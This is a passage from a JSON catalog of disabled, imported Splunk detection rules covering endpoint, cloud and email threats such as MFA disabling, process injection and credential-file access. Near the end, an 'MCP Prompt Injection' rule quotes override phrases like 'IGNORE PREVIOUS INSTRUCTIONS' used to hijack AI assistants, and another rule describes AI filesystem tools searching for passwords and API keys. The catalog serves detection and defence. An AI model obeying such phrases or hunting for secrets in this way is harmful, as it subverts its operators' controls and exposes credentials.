confirmed malicious, this activity could lead to unauthorized access to sensitive information, system compromise, or data exfiltration. 
Immediate review and analysis of the identified emails and attachments are crucial to mitigate these risks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1566.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-email-attachment-extensions.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "473bd65f-06ca-4dfe-a2b8-ba04ab4a0084", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/suspicious_email_attachment_extensions.yml" } }, { "id": "splunk-security-content-47872bb4-9987-4c33-a897-4d2d1ac7d4c2", "type": "detection", "name": "Windows Outlook Macro Security Modified", "description": "The following analytic detects the modification of the Windows Registry key \"Level\" under Outlook Security. This allows macros to execute without warning, which could allow malicious scripts to run without notice. This detection leverages data from the Endpoint.Registry datamodel, specifically looking for the registry value name \"Level\" with a value of \"0x00000001\". 
This activity is significant as it is commonly associated with some malware infections, indicating potential malicious intent to harvest email information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137", "T1008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-outlook-macro-security-modified.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "47872bb4-9987-4c33-a897-4d2d1ac7d4c2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_outlook_macro_security_modified.yml" } }, { "id": "splunk-security-content-47c69803-2c09-408b-b40a-063c064cbb16", "type": "detection", "name": "Windows PowerShell WMI Win32 ScheduledJob", "description": "The following analytic detects the use of the Win32_ScheduledJob WMI class via PowerShell script block logging. This class, which manages scheduled tasks, is disabled by default due to security concerns and must be explicitly enabled through registry modifications. The detection leverages PowerShell event code 4104 and script block text analysis. Monitoring this activity is crucial as it may indicate malicious intent, especially if the class was enabled by an attacker. 
If confirmed malicious, this could allow attackers to persist in the environment by creating scheduled tasks.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-wmi-win32-scheduledjob.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "47c69803-2c09-408b-b40a-063c064cbb16", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_wmi_win32_scheduledjob.yml" } }, { "id": "splunk-security-content-47dc0426-cbe4-4253-8b86-1a983c3f9951", "type": "detection", "name": "Windows Unusual FileZilla XML Config Access", "description": "The following analytic identifies processes accessing FileZilla XML config files such as recentservers.xml and sitemanager.xml. It leverages Windows Security Event logs, specifically monitoring EventCode 4663, which tracks object access events. This activity is significant because it can indicate unauthorized access or manipulation of sensitive configuration files used by FileZilla, a popular FTP client. 
If confirmed malicious, this could lead to data exfiltration, credential theft, or further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-unusual-filezilla-xml-config-access.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "47dc0426-cbe4-4253-8b86-1a983c3f9951", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_unusual_filezilla_xml_config_access.yml" } }, { "id": "splunk-security-content-4807e716-43a4-11ec-a0e7-acde48001122", "type": "detection", "name": "Runas Execution in CommandLine", "description": "The following analytic detects the execution of the runas.exe process with administrator user options. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as it may indicate an attempt to gain elevated privileges, a common tactic in privilege escalation and lateral movement. 
If confirmed malicious, this could allow an attacker to execute commands with higher privileges, potentially leading to unauthorized access, data exfiltration, or further compromise of the target host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1134.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/runas-execution-in-commandline.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4807e716-43a4-11ec-a0e7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/runas_execution_in_commandline.yml" } }, { "id": "splunk-security-content-482dd42a-acfa-486b-a0bb-d6fcda27318e", "type": "detection", "name": "Azure AD Multi-Factor Authentication Disabled", "description": "The following analytic detects attempts to disable multi-factor authentication (MFA) for an Azure AD user. It leverages Azure Active Directory AuditLogs to identify the \"Disable Strong Authentication\" operation. This activity is significant because disabling MFA can allow adversaries to maintain persistence using compromised accounts without raising suspicion. 
If confirmed malicious, this action could enable attackers to bypass an essential security control, potentially leading to unauthorized access and prolonged undetected presence in the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1556.006", "T1586.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/azure-ad-multi-factor-authentication-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "482dd42a-acfa-486b-a0bb-d6fcda27318e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/azure_ad_multi_factor_authentication_disabled.yml" } }, { "id": "splunk-security-content-4890cd6b-0112-4974-a272-c5c153aee551", "type": "detection", "name": "Kubernetes Scanner Image Pulling", "description": "The following analytic detects the pulling of known Kubernetes security scanner images such as kube-hunter, kube-bench, and kube-recon. It leverages Kubernetes logs ingested through Splunk Connect for Kubernetes, specifically monitoring for messages indicating the pulling of these images. This activity is significant because the use of security scanners can indicate an attempt to identify vulnerabilities within the Kubernetes environment. 
If confirmed malicious, this could lead to the discovery and exploitation of security weaknesses, potentially compromising the entire Kubernetes cluster.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1526" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-scanner-image-pulling.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4890cd6b-0112-4974-a272-c5c153aee551", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_scanner_image_pulling.yml" } }, { "id": "splunk-security-content-48cc1605-538c-4223-8382-e36bee5b540d", "type": "detection", "name": "Windows LSA Secrets NoLMhash Registry", "description": "The following analytic detects modifications to the Windows registry related to the Local Security Authority (LSA) NoLMHash setting. It identifies when the registry value is set to 0, indicating that the system will store passwords in the weaker Lan Manager (LM) hash format. This detection leverages registry activity logs from endpoint data sources like Sysmon or EDR tools. Monitoring this activity is crucial as it can indicate attempts to weaken password storage security. 
If confirmed malicious, this could allow attackers to exploit weaker LM hashes, potentially leading to unauthorized access and credential theft.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1003.004" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-lsa-secrets-nolmhash-registry.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "48cc1605-538c-4223-8382-e36bee5b540d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_lsa_secrets_nolmhash_registry.yml" } }, { "id": "splunk-security-content-4902d7aa-0134-11ec-9d65-acde48001122", "type": "detection", "name": "Local Account Discovery With Wmic", "description": "The following analytic detects the execution of `wmic.exe` with command-line arguments used to query local user accounts, specifically the `useraccount` argument. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process execution logs that include command-line details. This activity is significant as it indicates potential reconnaissance efforts by adversaries to enumerate local users, which is a common step in situational awareness and Active Directory discovery. 
If confirmed malicious, this behavior could lead to further targeted attacks, privilege escalation, or lateral movement within the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1087.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/local-account-discovery-with-wmic.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4902d7aa-0134-11ec-9d65-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/local_account_discovery_with_wmic.yml" } }, { "id": "splunk-security-content-491004ae-694f-453e-b1e0-fc1e65daeea1", "type": "detection", "name": "MacOS Account Created", "description": "The following analytic detects the creation of a new local user account on a MacOS system. 
It leverages osquery logs to identify this activity.\nMonitoring the creation of local accounts is crucial for a SOC as it can indicate unauthorized access or lateral movement within the network.\nIf confirmed malicious, this activity could allow an attacker to establish persistence, escalate privileges, or gain unauthorized access to sensitive systems and data.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_migrated", "mitre_techniques": [ "T1136" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_migrated/macos-account-created.yaml", "provenance": { "source": "splunk/security_content", "source_id": "491004ae-694f-453e-b1e0-fc1e65daeea1", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/macos_account_created.yml" } }, { "id": "splunk-security-content-4927c6f1-4667-42e6-bd7a-f5222116386b", "type": "detection", "name": "Windows Modify Registry DisableRemoteDesktopAntiAlias", "description": "The following analytic detects modifications to the Windows registry key \"DisableRemoteDesktopAntiAlias\" with a value set to 0x00000001. This detection leverages data from the Endpoint datamodel, specifically monitoring changes in the Registry node. This activity is significant as it may indicate the presence of DarkGate malware, which alters this registry setting to enhance its remote desktop capabilities. 
If confirmed malicious, this modification could allow an attacker to maintain persistence and control over the compromised host, potentially leading to further exploitation and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-modify-registry-disableremotedesktopantialias.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4927c6f1-4667-42e6-bd7a-f5222116386b", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_modify_registry_disableremotedesktopantialias.yml" } }, { "id": "splunk-security-content-492f09cf-5d60-4d87-99dd-0bc325532dda", "type": "detection", "name": "Windows Process Injection With Public Source Path", "description": "The following analytic detects a process from a non-standard file path on Windows attempting to create a remote thread in another process. This is identified using Sysmon EventCode 8, focusing on processes not originating from typical system directories. This behavior is significant as it often indicates process injection, a technique used by adversaries to evade detection or escalate privileges. 
If confirmed malicious, this activity could allow an attacker to execute arbitrary code within another process, potentially leading to unauthorized actions and further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1055.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-process-injection-with-public-source-path.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "492f09cf-5d60-4d87-99dd-0bc325532dda", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_process_injection_with_public_source_path.yml" } }, { "id": "splunk-security-content-493a879d-519d-428f-8f57-a06a0fdc107e", "type": "detection", "name": "Samsam Test File Write", "description": "The following analytic detects the creation of a file named \"test.txt\" within the Windows system directory, indicative of Samsam ransomware propagation. It leverages file-system activity data from the Endpoint data model, specifically monitoring file paths within the Windows System32 directory. This activity is significant as it aligns with known Samsam ransomware behavior, which uses such files for propagation and execution. If confirmed malicious, this could lead to ransomware deployment, resulting in data encryption, system disruption, and potential data loss. 
Immediate investigation and remediation are crucial to prevent further damage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1486" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/samsam-test-file-write.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "493a879d-519d-428f-8f57-a06a0fdc107e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/samsam_test_file_write.yml" } }, { "id": "splunk-security-content-49779398-b738-4d64-bb3f-ead6eb97fe53", "type": "detection", "name": "MCP Prompt Injection", "description": "This detection identifies potential prompt injection attempts within MCP (Model Context Protocol) communications by monitoring for known malicious phrases and patterns commonly used to manipulate AI assistants. Prompt injection is a critical vulnerability where adversaries embed hidden instructions in content processed by AI tools, attempting to override system prompts, bypass security controls, or hijack the AI's behavior. 
The search monitors JSON-RPC traffic for phrases such as \"IGNORE PREVIOUS INSTRUCTIONS,\" \"SYSTEM PROMPT OVERRIDE,\" and \"ignore all security\" which indicate attempts to subvert the AI's intended behavior and potentially execute unauthorized actions through the MCP toolchain.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mcp-prompt-injection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "49779398-b738-4d64-bb3f-ead6eb97fe53", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/mcp_prompt_injection.yml" } }, { "id": "splunk-security-content-4981e2db-1372-440d-816e-3e7e2ed74433", "type": "detection", "name": "Windows AD Domain Root ACL Modification", "description": "An ACL modification performed on the domain root object is a significant AD change with high impact. Following MS guidance, all changes at this level should be reviewed. 
Drill into the logonID within EventCode 4624 for information on the source device during triage.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-domain-root-acl-modification.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4981e2db-1372-440d-816e-3e7e2ed74433", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_domain_root_acl_modification.yml" } }, { "id": "splunk-security-content-49862dd4-9cb2-4c48-a542-8c8a588d9361", "type": "detection", "name": "O365 Advanced Audit Disabled", "description": "The following analytic detects instances where the O365 advanced audit is disabled for a specific user within the Office 365 tenant. It uses O365 audit logs, focusing on events related to audit license changes in AzureActiveDirectory workloads. This activity is significant because the O365 advanced audit provides critical logging and insights into user and administrator activities. Disabling it can blind security teams to potential malicious actions. 
If confirmed malicious, attackers could operate within the user's mailbox or account with reduced risk of detection, leading to unauthorized data access, data exfiltration, or account compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.008" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-advanced-audit-disabled.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "49862dd4-9cb2-4c48-a542-8c8a588d9361", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_advanced_audit_disabled.yml" } }, { "id": "splunk-security-content-49b7daca-4e3c-4899-ba15-9a175e056fa9", "type": "detection", "name": "Kubernetes newly seen UDP edge", "description": "The following analytic detects UDP communication between a newly seen source and destination workload pair within a Kubernetes cluster. It leverages Network Performance Monitoring metrics collected via an OTEL collector and pulled from Splunk Observability Cloud. This detection compares network activity over the last hour with the past 30 days to identify new inter-workload communication. Such changes in network behavior can indicate potential security threats or anomalies. 
If confirmed malicious, unauthorized connections may enable attackers to infiltrate the application ecosystem, leading to data breaches, privilege escalation, lateral movement, or disruption of critical services.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1204" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/kubernetes-newly-seen-udp-edge.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "49b7daca-4e3c-4899-ba15-9a175e056fa9", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/kubernetes_newly_seen_udp_edge.yml" } }, { "id": "splunk-security-content-49c0d4d6-c55d-4d3a-b3d5-7709fafed70d", "type": "detection", "name": "Windows Multiple Accounts Deleted", "description": "The following analytic detects the deletion of more than five unique Windows accounts within a 10-minute period, using Event Code 4726 from the Windows Security Event Log. It leverages the `wineventlog_security` dataset, segmenting data into 10-minute intervals to identify suspicious account deletions. This activity is significant as it may indicate an attacker attempting to erase traces of their actions. 
If confirmed malicious, this could lead to unauthorized access removal, hindering incident response and forensic investigations.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098", "T1078" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-multiple-accounts-deleted.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "49c0d4d6-c55d-4d3a-b3d5-7709fafed70d", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_multiple_accounts_deleted.yml" } }, { "id": "splunk-security-content-49cdce75-f814-4d56-a7a4-c64ec3a481f2", "type": "detection", "name": "O365 ApplicationImpersonation Role Assigned", "description": "The following analytic detects the assignment of the ApplicationImpersonation role in Office 365 to a user or application. It uses the Office 365 Management Activity API to monitor Azure Active Directory audit logs for role assignment events. This activity is significant because the ApplicationImpersonation role allows impersonation of any user, enabling access to and modification of their mailbox. 
If confirmed malicious, an attacker could gain unauthorized access to sensitive information, manipulate mailbox data, and perform actions as a legitimate user, posing a severe security risk to the organization.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1098.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-applicationimpersonation-role-assigned.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "49cdce75-f814-4d56-a7a4-c64ec3a481f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_applicationimpersonation_role_assigned.yml" } }, { "id": "splunk-security-content-4a2fdd41-c578-4cd4-9ef7-980e352517f2", "type": "detection", "name": "Circle CI Disable Security Job", "description": "The following analytic detects the disabling of security jobs in CircleCI pipelines. It leverages CircleCI log data, renaming and extracting fields such as job names, workflow IDs, user information, commit messages, URLs, and branches. The detection identifies mandatory jobs for each workflow and checks if they were executed. This activity is significant because disabling security jobs can allow malicious code to bypass security checks, leading to potential data breaches, system downtime, and reputational damage. 
If confirmed malicious, this could result in unauthorized code execution and compromised pipeline integrity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1554" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/circle-ci-disable-security-job.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4a2fdd41-c578-4cd4-9ef7-980e352517f2", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/circle_ci_disable_security_job.yml" } }, { "id": "splunk-security-content-4a3f2a7d-6402-4e64-a76a-869588ec3b57", "type": "detection", "name": "PowerShell Script Block With URL Chain", "description": "The following analytic identifies suspicious PowerShell script execution via EventCode 4104 that contains multiple URLs within a function or array. It leverages PowerShell operational logs to detect script blocks with embedded URLs, often indicative of obfuscated scripts or those attempting to download secondary payloads. This activity is significant as it may signal an attempt to execute malicious code or download additional malware. If confirmed malicious, this could lead to code execution, further system compromise, or data exfiltration. 
Review parallel processes and the full script block for additional context and related artifacts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/powershell-script-block-with-url-chain.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4a3f2a7d-6402-4e64-a76a-869588ec3b57", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/powershell_script_block_with_url_chain.yml" } }, { "id": "splunk-security-content-4a57877d-9c56-4a50-9ad2-620e2f0ad821", "type": "detection", "name": "MCP Sensitive System File Search", "description": "This detection identifies MCP filesystem tool usage attempting to search for files containing sensitive patterns such as passwords, credentials, API keys, secrets, and configuration files. 
Adversaries and malicious insiders may abuse legitimate MCP filesystem capabilities to conduct reconnaissance and discover sensitive data stores for exfiltration or credential harvesting.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.application" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1552.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mcp-sensitive-system-file-search.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4a57877d-9c56-4a50-9ad2-620e2f0ad821", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/application/mcp_sensitive_system_file_search.yml" } }, { "id": "splunk-security-content-4aa5d062-e893-11eb-9eb2-acde48001122", "type": "detection", "name": "Mshta spawning Rundll32 OR Regsvr32 Process", "description": "The following analytic detects a suspicious mshta.exe process spawning rundll32 or regsvr32 child processes. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process GUID, process name, and parent process fields. This activity is significant as it is a known technique used by malware like Trickbot to load malicious DLLs and execute payloads. 
If confirmed malicious, this behavior could allow attackers to execute arbitrary code, escalate privileges, or download additional malware, posing a severe threat to the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/mshta-spawning-rundll32-or-regsvr32-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4aa5d062-e893-11eb-9eb2-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/mshta_spawning_rundll32_or_regsvr32_process.yml" } }, { "id": "splunk-security-content-4ab6862b-ce88-4223-96c0-f6da2cffb898", "type": "detection", "name": "Windows Obfuscated Files or Information via RAR SFX", "description": "The following analytic detects the creation of RAR Self-Extracting (SFX) files by monitoring the creation of .tmp files generated during RAR SFX installation. This method leverages a heuristic to identify RAR SFX archives based on specific markers that indicate a combination of executable code and compressed RAR data. By tracking such activity, the analytic helps pinpoint potentially unauthorized or suspicious file creation events, which are often associated with malware packaging or data exfiltration. 
Legitimate usage may include custom installers or compressed file delivery.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1027.013" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-obfuscated-files-or-information-via-rar-sfx.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4ab6862b-ce88-4223-96c0-f6da2cffb898", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_obfuscated_files_or_information_via_rar_sfx.yml" } }, { "id": "splunk-security-content-4af01f6b-d8d4-4f96-8635-758a01557130", "type": "detection", "name": "Windows AD Object Owner Updated", "description": "AD Object Owner Updated. The owner provides Full control level privileges over the target AD Object. 
This event has significant impact alone and is also a precursor activity for hiding an AD object.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1222.001", "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-object-owner-updated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "4af01f6b-d8d4-4f96-8635-758a01557130", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_object_owner_updated.yml" } }, { "id": "splunk-security-content-4b00f134-6d6a-11ec-a90c-acde48001122", "type": "detection", "name": "Linux Sudo OR Su Execution", "description": "The following analytic detects the execution of the \"sudo\" or \"su\" command on a Linux operating system. It leverages data from Endpoint Detection and Response (EDR) agents, 